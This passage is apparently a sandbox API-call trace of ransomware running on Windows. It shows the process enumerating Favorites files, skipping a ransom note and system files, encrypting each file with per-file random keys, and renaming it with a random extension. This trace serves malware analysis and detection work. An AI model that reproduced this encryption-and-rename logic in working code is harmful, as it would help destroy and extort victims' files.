dwFreeType=0x8000) returned 1 [0085.057] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.057] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedfd020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaedfd020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.057] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.057] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.057] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.057] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.057] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.057] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.057] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.057] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.057] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\jkbimi8.tmp" [0085.057] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.058] CloseHandle (hObject=0x0) returned 0 [0085.058] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.058] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="autorun.inf") returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="boot.ini") returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="desktop.ini") returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="ntuser.dat") returned -1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="iconcache.db") returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="bootsect.bak") returned 1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="ntuser.dat.log") returned -1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="thumbs.db") returned -1 [0085.058] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Bootfont.bin") returned 1 [0085.058] lstrlenW (lpString="Microsoft At Home.url") returned 21 [0085.058] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.058] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.058] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.058] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.058] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.058] lstrlenW (lpString="Microsoft At Home.url") returned 21 [0085.058] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Home.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0085.059] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.059] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.059] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.059] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.059] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.059] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.059] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.061] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.061] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.061] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.062] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.062] CloseHandle (hObject=0x42c) returned 1 [0085.062] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.062] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.063] CloseHandle (hObject=0x0) returned 0 [0085.063] CloseHandle (hObject=0x428) returned 1 [0085.063] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.063] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.063] GetTickCount () returned 0x114dba0 [0085.063] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.064] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.064] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.064] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.064] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 80 [0085.065] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG") returned 87 [0085.065] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.gutyCG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.gutycg"), dwFlags=0x0) returned 1 [0085.065] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.065] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.066] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.066] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="autorun.inf") returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="boot.ini") returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="desktop.ini") returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="ntuser.dat") returned -1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="iconcache.db") returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="bootsect.bak") returned 1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="ntuser.dat.log") returned -1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="thumbs.db") returned -1 [0085.066] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Bootfont.bin") returned 1 [0085.066] lstrlenW (lpString="Microsoft At Work.url") returned 21 [0085.066] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.066] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.066] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.066] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.066] lstrlenW (lpString="Microsoft At Work.url") returned 21 [0085.066] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Work.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" [0085.066] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.067] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.067] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.067] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.067] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.067] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.067] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.069] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.069] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.069] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.070] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.070] CloseHandle (hObject=0x42c) returned 1 [0085.070] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.070] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.071] CloseHandle (hObject=0x0) returned 0 [0085.071] CloseHandle (hObject=0x428) returned 1 [0085.071] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.071] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.072] GetTickCount () returned 0x114dba0 [0085.072] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.072] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.072] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.072] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.072] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.073] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 80 [0085.073] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG") returned 87 [0085.073] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.gutycg"), dwFlags=0x0) returned 1 [0085.073] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.073] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.074] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.074] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="autorun.inf") returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="boot.ini") returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="desktop.ini") returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="ntuser.dat") returned -1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="iconcache.db") returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="bootsect.bak") returned 1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="ntuser.dat.log") returned -1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="thumbs.db") returned -1 [0085.074] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Bootfont.bin") returned 1 [0085.074] lstrlenW (lpString="Microsoft Store.url") returned 19 [0085.074] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.074] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.074] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.074] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.074] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.074] lstrlenW (lpString="Microsoft Store.url") returned 19 [0085.074] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft Store.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" [0085.074] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.076] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=134) returned 1 [0085.076] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.076] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.076] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.076] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.076] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.078] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.078] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.078] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.078] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.079] CloseHandle (hObject=0x42c) returned 1 [0085.079] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.079] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.080] CloseHandle (hObject=0x0) returned 0 [0085.080] CloseHandle (hObject=0x428) returned 1 [0085.080] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.080] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.081] GetTickCount () returned 0x114dbb0 [0085.081] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.081] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.081] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.081] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.082] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 78 [0085.082] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1") returned 85 [0085.082] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.5ycxy1"), dwFlags=0x0) returned 1 [0085.082] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.082] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.083] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.083] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0085.083] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.083] CloseHandle (hObject=0x410) returned 1 [0085.083] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0085.083] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0085.083] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0085.083] lstrcatW (in: lpString1="MSN Websites", lpString2="\\" | out: lpString1="MSN Websites\\") returned="MSN Websites\\" [0085.083] lstrcatW (in: 